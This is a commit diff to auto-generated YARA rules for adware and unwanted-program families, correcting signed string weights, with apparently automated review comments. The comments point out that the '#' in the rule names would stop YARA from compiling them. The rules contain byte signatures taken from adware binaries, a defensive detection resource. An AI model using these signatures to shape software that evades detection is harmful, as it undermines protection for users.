fix error condition

roadwy 2024-07-07 16:59:59 +08:00
parent c65741fd7e
commit 4285531c38
374 changed files with 9233 additions and 9233 deletions


@ -82,10 +82,10 @@ rule _#PUA_Block_InstallCore_7{
$a_80_2 = {53 4b 49 50 5f 4f 46 46 45 52 } //SKIP_OFFER 1
$a_80_3 = {43 48 4f 4f 53 45 5f 44 45 46 41 55 4c 54 5f 4f 46 46 45 52 } //CHOOSE_DEFAULT_OFFER 1
$a_80_4 = {6f 70 65 72 61 70 72 65 66 73 2e 69 6e 69 } //operaprefs.ini 1
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*65436+(#a_80_6 & 1)*65436) >=5
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*-100+(#a_80_6 & 1)*-100) >=5
}
rule _#PUA_Block_InstallCore_8{
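Review bot: The rule names in this file keep a `#` in the identifier, visible on the context line `rule _#PUA_Block_InstallCore_8{` and in the rule this hunk belongs to, and YARA only allows letters, digits and `_` in a rule identifier, so if these files are meant to be compiled by YARA the repaired condition still never loads. The name looks inherited from the Defender signature name; mapping the offending character to an underscore, e.g. `rule _PUA_Block_InstallCore_8{`, and keeping the original name in a `meta:` field would preserve the information without breaking the parser. The sign change itself is consistent across the diff (65436 is 0x10000 minus 100, i.e. the weight field read as a signed 16-bit integer) and `*-100` parses under YARA's unary minus. With a threshold of 5 against five weight-1 strings, a hit on `Uninst.exe` or `Uninstall.exe` now vetoes the match, which is presumably the intended exclusion semantics.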


@ -205,10 +205,10 @@ rule _#PUA_Block_KuaiZip_15{
$a_00_5 = {6e 65 77 73 2e 74 6f 75 74 69 61 6f 62 61 73 68 69 2e 63 6f 6d } //1 news.toutiaobashi.com
$a_00_6 = {33 36 30 63 68 72 6f 6d 65 2e 65 78 65 } //1 360chrome.exe
$a_00_7 = {6f 70 65 72 61 2e 65 78 65 } //1 opera.exe
$a_80_8 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_9 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
$a_80_8 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_9 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_80_8 & 1)*65436+(#a_80_9 & 1)*65436) >=8
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_80_8 & 1)*-100+(#a_80_9 & 1)*-100) >=8
}
rule _#PUA_Block_KuaiZip_16{
@ -237,10 +237,10 @@ rule _#PUA_Block_KuaiZip_17{
$a_80_2 = {61 70 69 2e 6b 70 7a 69 70 2e 63 6f 6d } //api.kpzip.com 1
$a_80_3 = {64 3a 5c 73 76 6e 72 6f 6f 74 5c 6b 75 61 69 7a 69 70 5c 74 72 75 6e 6b 5c 62 69 6e 5c 52 65 6c 65 61 73 65 5c 58 38 36 5c 4b 7a 55 70 64 61 74 65 41 67 65 6e 63 79 2e 70 64 62 } //d:\svnroot\kuaizip\trunk\bin\Release\X86\KzUpdateAgency.pdb 1
$a_80_4 = {6b 7a 75 70 64 61 74 65 61 67 65 6e 63 79 } //kzupdateagency 1
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*65436+(#a_80_6 & 1)*65436) >=5
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*-100+(#a_80_6 & 1)*-100) >=5
}
rule _#PUA_Block_KuaiZip_18{


@ -33,9 +33,9 @@ rule _#PUA_Block_Softcnapp_3{
$a_80_0 = {63 68 69 6e 61 76 69 70 73 6f 66 74 2e 63 6f 6d } //chinavipsoft.com 1
$a_80_1 = {55 73 65 56 65 73 74 69 67 65 2e 69 6e 69 } //UseVestige.ini 1
$a_80_2 = {57 61 6e 4e 65 6e 67 5a 69 70 2e 69 6e 69 } //WanNengZip.ini 1
$a_80_3 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin 65526
$a_80_3 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin -10
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*65526) >=3
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*-10) >=3
}
rule _#PUA_Block_Softcnapp_4{
@ -46,9 +46,9 @@ rule _#PUA_Block_Softcnapp_4{
$a_02_0 = {65 6c 65 70 68 61 6e 74 70 64 66 90 02 0f 2e 79 65 62 61 6e 6b 65 6a 69 2e 63 6e 90 00 } //1
$a_80_1 = {45 68 50 44 46 } //EhPDF 1
$a_80_2 = {50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 45 6c 65 70 68 61 6e 74 } //Program Files\Elephant 1
$a_80_3 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65531
$a_80_3 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -5
condition:
((#a_02_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*65531) >=3
((#a_02_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*-5) >=3
}
rule _#PUA_Block_Softcnapp_5{
@ -115,9 +115,9 @@ rule _#PUA_Block_Softcnapp_9{
$a_80_1 = {7a 79 63 75 6c 74 75 72 61 2e 63 6f 6d } //zycultura.com 1
$a_80_2 = {58 73 50 69 63 49 6e 66 6f 2e 69 6e 69 } //XsPicInfo.ini 1
$a_80_3 = {55 73 65 56 65 73 74 69 67 65 2e 69 6e 69 } //UseVestige.ini 1
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65531
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -5
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*65531) >=4
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*-5) >=4
}
rule _#PUA_Block_Softcnapp_10{
@ -129,10 +129,10 @@ rule _#PUA_Block_Softcnapp_10{
$a_80_1 = {74 6a 69 2e 7a 68 69 6c 69 6e 67 73 68 69 64 61 69 2e 63 6f 6d } //tji.zhilingshidai.com 2
$a_80_2 = {64 6f 77 6e 2e 7a 68 69 6c 69 6e 67 73 68 69 64 61 69 2e 63 6f 6d } //down.zhilingshidai.com 1
$a_80_3 = {55 73 65 49 6e 66 6f 2e 69 6e 69 } //UseInfo.ini 1
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_5 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_5 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
condition:
((#a_80_0 & 1)*2+(#a_80_1 & 1)*2+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*65436+(#a_80_5 & 1)*65436) >=5
((#a_80_0 & 1)*2+(#a_80_1 & 1)*2+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*-100+(#a_80_5 & 1)*-100) >=5
}
rule _#PUA_Block_Softcnapp_11{
@ -144,9 +144,9 @@ rule _#PUA_Block_Softcnapp_11{
$a_80_1 = {43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 4d 47 57 61 6c 6c 70 61 70 65 72 5c } //C:\Program Files\MGWallpaper\ 1
$a_00_2 = {73 6f 66 74 74 6a 2e 70 61 6e 73 68 69 78 6b 2e 63 6f 6d } //1 softtj.panshixk.com
$a_80_3 = {4d 67 57 61 6c 6c 2e 65 78 65 } //MgWall.exe 1
$a_80_4 = {50 65 72 73 69 73 74 42 61 72 5f 4f 6e 43 6f 6e 74 69 6e 75 65 55 6e 69 6e 73 74 } //PersistBar_OnContinueUninst 65531
$a_80_4 = {50 65 72 73 69 73 74 42 61 72 5f 4f 6e 43 6f 6e 74 69 6e 75 65 55 6e 69 6e 73 74 } //PersistBar_OnContinueUninst -5
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_00_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*65531) >=4
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_00_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*-5) >=4
}
rule _#PUA_Block_Softcnapp_12{
@ -172,10 +172,10 @@ rule _#PUA_Block_Softcnapp_13{
$a_80_1 = {43 3a 5c 4e 6f 53 68 6f 77 48 74 74 70 43 6f 6e 74 65 2e 6e 74 6c } //C:\NoShowHttpConte.ntl 1
$a_80_2 = {4d 69 6e 69 50 61 67 65 2e 65 78 65 } //MiniPage.exe 1
$a_80_3 = {6f 74 74 2e 78 73 66 61 79 61 2e 63 6f 6d } //ott.xsfaya.com 1
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_5 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_5 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*65436+(#a_80_5 & 1)*65436) >=4
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*-100+(#a_80_5 & 1)*-100) >=4
}
rule _#PUA_Block_Softcnapp_14{
@ -188,11 +188,11 @@ rule _#PUA_Block_Softcnapp_14{
$a_80_2 = {58 73 50 69 63 56 69 65 77 } //XsPicView 1
$a_02_3 = {58 00 73 00 50 00 69 00 63 00 90 02 0f 2e 00 65 00 78 00 65 00 90 00 } //1
$a_02_4 = {58 73 50 69 63 90 02 0f 2e 65 78 65 90 00 } //1
$a_80_5 = {58 73 50 69 63 55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //XsPicUninstall.exe 65436
$a_80_6 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_7 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
$a_80_5 = {58 73 50 69 63 55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //XsPicUninstall.exe -100
$a_80_6 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_7 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
condition:
((#a_80_0 & 1)*2+(#a_80_1 & 1)*2+(#a_80_2 & 1)*1+(#a_02_3 & 1)*1+(#a_02_4 & 1)*1+(#a_80_5 & 1)*65436+(#a_80_6 & 1)*65436+(#a_80_7 & 1)*65436) >=5
((#a_80_0 & 1)*2+(#a_80_1 & 1)*2+(#a_80_2 & 1)*1+(#a_02_3 & 1)*1+(#a_02_4 & 1)*1+(#a_80_5 & 1)*-100+(#a_80_6 & 1)*-100+(#a_80_7 & 1)*-100) >=5
}
rule _#PUA_Block_Softcnapp_15{
@ -265,10 +265,10 @@ rule _#PUA_Block_Softcnapp_19{
$a_80_4 = {4d 69 6e 69 44 75 6d 70 57 72 69 74 65 44 75 6d 70 } //MiniDumpWriteDump 1
$a_80_5 = {6f 70 74 2e 76 6b 75 70 64 66 2e 63 6f 6d } //opt.vkupdf.com 1
$a_80_6 = {42 65 73 74 5a 69 70 2e 65 78 65 } //BestZip.exe 1
$a_80_7 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_8 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
$a_80_7 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_8 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*65436+(#a_80_8 & 1)*65436) >=7
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*-100+(#a_80_8 & 1)*-100) >=7
}
rule _#PUA_Block_Softcnapp_20{
@ -286,9 +286,9 @@ rule _#PUA_Block_Softcnapp_20{
$a_80_7 = {4a 4b 43 6f 76 79 62 61 77 62 79 2e 69 6e 69 } //JKCovybawby.ini 1
$a_80_8 = {4a 69 6b 65 50 44 46 43 6f 6e 76 65 72 74 65 72 2e 69 6e 69 } //JikePDFConverter.ini 1
$a_80_9 = {5a 48 50 44 46 49 6e 66 6f 2e 69 6e 69 } //ZHPDFInfo.ini 1
$a_80_10 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin 65531
$a_80_10 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin -5
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*65531) >=3
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*-5) >=3
}
rule _#PUA_Block_Softcnapp_21{
@ -307,9 +307,9 @@ rule _#PUA_Block_Softcnapp_21{
$a_80_8 = {46 6c 69 72 74 63 6b 79 6f 75 73 } //Flirtckyous 1
$a_80_9 = {4d 75 6f 74 65 72 69 6e 65 2e 69 6e 69 } //Muoterine.ini 1
$a_80_10 = {59 61 72 6e 72 6f 75 6e 64 } //Yarnround 1
$a_80_11 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin 65531
$a_80_11 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin -5
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_00_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*1+(#a_80_11 & 1)*65531) >=3
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_00_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*1+(#a_80_11 & 1)*-5) >=3
}
rule _#PUA_Block_Softcnapp_22{
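Review bot: Not every negative weight in this file is a veto, and nothing in the emitted text says which is which: in `_#PUA_Block_Softcnapp_20` the `UninstFinishBgSkin` term is `-5` against ten weight-1 strings and a threshold of 3, so a sample matching every positive string plus the uninstaller string still scores 5 and fires, whereas the same string at `-10` in `_#PUA_Block_Softcnapp_3` (three positives, threshold 3) suppresses the match outright. If the generator is expected to reproduce the Defender weights faithfully this is data rather than a bug, but a reader skimming `//UninstFinishBgSkin -5` will assume an exclusion. I would have the generator annotate each negative string with its effect, computed from the weights and threshold it already has, e.g. `//UninstFinishBgSkin -5 (penalty: all positives still reach threshold)` versus `(veto)`.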


@ -525,7 +525,7 @@ rule Adware_Win32_AdRotator_35{
$a_00_39 = {26 00 61 00 66 00 66 00 3d 00 7b 00 31 00 7d 00 26 00 68 00 77 00 3d 00 7b 00 32 00 7d 00 01 00 44 01 7b 00 30 00 7d 00 2f 00 6d 00 6f 00 64 00 2f 00 75 00 6e 00 6f 00 74 00 69 00 66 00 79 00 2e 00 70 00 68 00 70 00 3f 00 61 00 66 00 66 00 3d 00 7b 00 31 00 7d 00 26 00 68 00 77 00 3d 00 7b 00 32 00 7d 00 01 00 44 01 7b 00 30 00 7d 00 2f 00 6d } //115
$a_00_41 = {6b 00 64 00 6d 00 5f 00 64 00 62 00 32 00 2e 00 70 00 68 00 70 00 3f 00 6e 00 65 00 74 00 3d 00 7b 00 31 00 7d 00 26 00 76 00 3d 00 7b 00 32 00 7d 00 01 00 16 01 7b 00 30 00 7d 00 20 00 7b 00 31 00 7d 00 5f 00 7b 00 32 00 7d 00 01 00 38 01 54 00 65 00 6d 00 70 00 6f 00 72 00 61 00 72 00 79 00 20 00 49 00 } //47
$a_00_42 = {65 00 72 00 6e 00 65 00 74 00 20 00 46 00 69 00 6c 00 65 00 73 00 00 00 6c 00 6f 00 77 00 01 00 19 01 33 d8 8b 46 08 03 c2 66 89 5d 08 66 8b 5d 08 66 33 18 8b 06 4a 66 89 1c 01 01 00 18 01 33 d8 66 89 5d 08 8b 46 08 66 8b 5d 08 03 c2 66 33 18 8b 06 66 89 1c 48 01 00 1f 03 33 c3 88 45 ff 0f b6 45 ff 83 90 01 02 88 45 ff 8a 45 ff 32 01 8b 5e 90 01 } //110
$a_1a_43 = {00 01 00 1e } //34817 ĀḀ
$a_1a_43 = {00 01 00 1e } //-30719 ĀḀ
$a_8b_44 = {08 88 54 24 08 0f b6 54 24 08 2b c8 8a 49 90 01 01 32 d1 8b 0e 88 14 08 90 00 01 00 12 01 8b 4b 10 66 8b 0c 01 66 33 4b 08 8b 53 0c 66 89 0c 10 01 00 14 01 eb 09 8b 4c 24 04 8a 09 30 08 40 3b 44 24 08 75 f1 c2 08 00 01 00 12 01 8a 4c 24 04 3b c2 74 0a 30 08 0f be 08 40 3b c2 75 f6 01 00 12 01 74 10 8a 4c 24 0c 30 08 0f be 08 40 3b 44 24 08 75 f4 01 00 0e 01 eb 06 30 08 0f be 08 40 3b 44 24 04 75 f4 01 00 13 01 8b 44 24 04 eb 04 80 00 8f 40 3b 44 24 08 75 f6 c2 08 00 01 00 1d 03 66 33 3c 02 ff 90 03 01 01 4d 6d 0c 8b 19 66 89 3c 1e 75 ee 66 8b 3c 02 66 33 38 90 00 01 00 20 01 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 73 } //13059
$a_00_46 = {6d 00 69 00 6e 00 67 00 01 00 16 01 63 00 6c 00 69 00 63 00 6b 00 62 00 75 00 73 00 74 00 65 00 72 00 01 00 14 01 65 00 61 00 72 00 6e 00 66 00 6f 00 72 00 66 00 75 00 6e 00 01 00 1c 01 65 00 78 00 70 00 72 00 65 00 73 00 73 00 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 01 00 12 01 63 00 61 } //101
$a_00_48 = {74 00 61 00 6e 00 01 00 14 01 68 00 6f 00 74 00 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 01 00 18 01 74 00 6f 00 70 00 67 00 65 00 61 00 72 00 6d 00 6f 00 6e 00 65 00 79 00 01 00 12 01 76 00 6f 00 67 00 75 00 65 00 63 00 61 00 73 00 68 00 01 00 10 01 62 00 72 00 69 00 6e 00 63 00 6f 00 6d 00 65 00 01 00 1c 01 79 } //116
@ -539,7 +539,7 @@ rule Adware_Win32_AdRotator_35{
$a_56_58 = {64 6e 6f 70 6f 70 70 6f 70 6f 70 6f 40 40 01 00 0f 01 2e 3f 41 56 4c 6f 65 70 77 6b 73 78 6d 40 40 01 00 0e 01 2e 3f 41 56 50 71 71 72 70 72 74 75 40 40 01 00 17 03 8b 54 24 04 8a 14 10 8b 4e 04 } //16174
$a_40_59 = {f8 90 01 01 76 ed 90 00 } //5256
condition:
((#a_11_0 & 1)*30+(#a_67_1 & 1)*3840+(#a_64_2 & 1)*26465+(#a_1e_3 & 1)*30066+(#a_61_4 & 1)*4371+(#a_64_5 & 1)*29797+(#a_75_6 & 1)*24435+(#a_61_7 & 1)*27507+(#a_72_8 & 1)*26222+(#a_3f_9 & 1)*16703+(#a_01_10 & 1)*16485+(#a_40_11 & 1)*25956+(#a_43_12 & 1)*16703+(#a_6b_13 & 1)*17494+(#a_71_14 & 1)*16726+(#a_00_15 & 1)*100+(#a_00_17 & 1)*104+(#a_00_19 & 1)*121+(#a_00_20 & 1)*103+(#a_00_22 & 1)*102+(#a_73_23 & 1)*5120+(#a_00_25 & 1)*98+(#a_00_26 & 1)*101+(#a_00_28 & 1)*99+(#a_65_29 & 1)*18262+(#a_67_30 & 1)*24936+(#a_6f_31 & 1)*28532+(#a_2e_32 & 1)*3584+(#a_6b_33 & 1)*17494+(#a_71_34 & 1)*16726+(#a_00_35 & 1)*32+(#a_00_37 & 1)*118+(#a_00_39 & 1)*115+(#a_00_41 & 1)*47+(#a_00_42 & 1)*110+(#a_1a_43 & 1)*34817+(#a_8b_44 & 1)*13059+(#a_00_46 & 1)*101+(#a_00_48 & 1)*116+(#a_00_50 & 1)*114+(#a_00_51 & 1)*108+(#a_76_52 & 1)*6656+(#a_00_54 & 1)*108+(#a_00_55 & 1)*105+(#a_00_56 & 1)*278+(#a_70_57 & 1)*19286+(#a_56_58 & 1)*16174+(#a_40_59 & 1)*5256) >=32
((#a_11_0 & 1)*30+(#a_67_1 & 1)*3840+(#a_64_2 & 1)*26465+(#a_1e_3 & 1)*30066+(#a_61_4 & 1)*4371+(#a_64_5 & 1)*29797+(#a_75_6 & 1)*24435+(#a_61_7 & 1)*27507+(#a_72_8 & 1)*26222+(#a_3f_9 & 1)*16703+(#a_01_10 & 1)*16485+(#a_40_11 & 1)*25956+(#a_43_12 & 1)*16703+(#a_6b_13 & 1)*17494+(#a_71_14 & 1)*16726+(#a_00_15 & 1)*100+(#a_00_17 & 1)*104+(#a_00_19 & 1)*121+(#a_00_20 & 1)*103+(#a_00_22 & 1)*102+(#a_73_23 & 1)*5120+(#a_00_25 & 1)*98+(#a_00_26 & 1)*101+(#a_00_28 & 1)*99+(#a_65_29 & 1)*18262+(#a_67_30 & 1)*24936+(#a_6f_31 & 1)*28532+(#a_2e_32 & 1)*3584+(#a_6b_33 & 1)*17494+(#a_71_34 & 1)*16726+(#a_00_35 & 1)*32+(#a_00_37 & 1)*118+(#a_00_39 & 1)*115+(#a_00_41 & 1)*47+(#a_00_42 & 1)*110+(#a_1a_43 & 1)*-30719+(#a_8b_44 & 1)*13059+(#a_00_46 & 1)*101+(#a_00_48 & 1)*116+(#a_00_50 & 1)*114+(#a_00_51 & 1)*108+(#a_76_52 & 1)*6656+(#a_00_54 & 1)*108+(#a_00_55 & 1)*105+(#a_00_56 & 1)*278+(#a_70_57 & 1)*19286+(#a_56_58 & 1)*16174+(#a_40_59 & 1)*5256) >=32
}
rule Adware_Win32_AdRotator_36{
@ -573,7 +573,7 @@ rule Adware_Win32_AdRotator_36{
$a_00_32 = {26 00 61 00 66 00 66 00 3d 00 7b 00 31 00 7d 00 26 00 68 00 77 00 3d 00 7b 00 32 00 7d 00 01 00 44 01 7b 00 30 00 7d 00 2f 00 6d 00 6f 00 64 00 2f 00 75 00 6e 00 6f 00 74 00 69 00 66 00 79 00 2e 00 70 00 68 00 70 00 3f 00 61 00 66 00 66 00 3d 00 7b 00 31 00 7d 00 26 00 68 00 77 00 3d 00 7b 00 32 00 7d 00 01 00 44 01 7b 00 30 00 7d 00 2f 00 6d } //115
$a_00_34 = {6b 00 64 00 6d 00 5f 00 64 00 62 00 32 00 2e 00 70 00 68 00 70 00 3f 00 6e 00 65 00 74 00 3d 00 7b 00 31 00 7d 00 26 00 76 00 3d 00 7b 00 32 00 7d 00 01 00 16 01 7b 00 30 00 7d 00 20 00 7b 00 31 00 7d 00 5f 00 7b 00 32 00 7d 00 01 00 38 01 54 00 65 00 6d 00 70 00 6f 00 72 00 61 00 72 00 79 00 20 00 49 00 } //47
$a_00_35 = {65 00 72 00 6e 00 65 00 74 00 20 00 46 00 69 00 6c 00 65 00 73 00 00 00 6c 00 6f 00 77 00 01 00 19 01 33 d8 8b 46 08 03 c2 66 89 5d 08 66 8b 5d 08 66 33 18 8b 06 4a 66 89 1c 01 01 00 18 01 33 d8 66 89 5d 08 8b 46 08 66 8b 5d 08 03 c2 66 33 18 8b 06 66 89 1c 48 01 00 1f 03 33 c3 88 45 ff 0f b6 45 ff 83 90 01 02 88 45 ff 8a 45 ff 32 01 8b 5e 90 01 } //110
$a_1a_36 = {00 01 00 1e } //34817 ĀḀ
$a_1a_36 = {00 01 00 1e } //-30719 ĀḀ
$a_8b_37 = {08 88 54 24 08 0f b6 54 24 08 2b c8 8a 49 90 01 01 32 d1 8b 0e 88 14 08 90 00 01 00 12 01 8b 4b 10 66 8b 0c 01 66 33 4b 08 8b 53 0c 66 89 0c 10 01 00 14 01 eb 09 8b 4c 24 04 8a 09 30 08 40 3b 44 24 08 75 f1 c2 08 00 01 00 12 01 8a 4c 24 04 3b c2 74 0a 30 08 0f be 08 40 3b c2 75 f6 01 00 12 01 74 10 8a 4c 24 0c 30 08 0f be 08 40 3b 44 24 08 75 f4 01 00 0e 01 eb 06 30 08 0f be 08 40 3b 44 24 04 75 f4 01 00 13 01 8b 44 24 04 eb 04 80 00 8f 40 3b 44 24 08 75 f6 c2 08 00 01 00 1d 03 66 33 3c 02 ff 90 03 01 01 4d 6d 0c 8b 19 66 89 3c 1e 75 ee 66 8b 3c 02 66 33 38 90 00 01 00 20 01 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 73 } //13059
$a_00_39 = {6d 00 69 00 6e 00 67 00 01 00 16 01 63 00 6c 00 69 00 63 00 6b 00 62 00 75 00 73 00 74 00 65 00 72 00 01 00 14 01 65 00 61 00 72 00 6e 00 66 00 6f 00 72 00 66 00 75 00 6e 00 01 00 1c 01 65 00 78 00 70 00 72 00 65 00 73 00 73 00 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 01 00 12 01 63 00 61 } //101
$a_00_41 = {74 00 61 00 6e 00 01 00 14 01 68 00 6f 00 74 00 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 01 00 18 01 74 00 6f 00 70 00 67 00 65 00 61 00 72 00 6d 00 6f 00 6e 00 65 00 79 00 01 00 12 01 76 00 6f 00 67 00 75 00 65 00 63 00 61 00 73 00 68 00 01 00 10 01 62 00 72 00 69 00 6e 00 63 00 6f 00 6d 00 65 00 01 00 1c 01 79 } //116
@ -591,10 +591,10 @@ rule Adware_Win32_AdRotator_36{
$a_03_55 = {8a 14 1a 8a c2 02 c0 02 d0 c0 e2 90 01 01 80 fa 90 01 01 7d 90 00 } //1
$a_10_56 = {00 00 e6 49 f8 07 33 da e1 fe 39 ca b5 e4 00 04 00 80 80 10 00 00 1b 8c 77 12 57 d0 9a 83 ec 0f 7c a9 30 04 00 80 80 10 00 00 ff 53 0d 1b 60 93 84 fb 37 d2 fe 7f 00 04 00 80 80 10 00 00 8c b4 5a 2f dc 72 d7 a2 b5 f1 dd f4 00 10 00 80 80 10 00 00 ad ab 04 3a 63 34 6f c9 ed e9 10 79 00 10 00 80 80 10 00 00 6c 99 0d 52 a0 27 79 5f 04 c1 49 1d 00 10 00 80 80 10 00 00 a0 3d 6a 6a ec 2e } //0
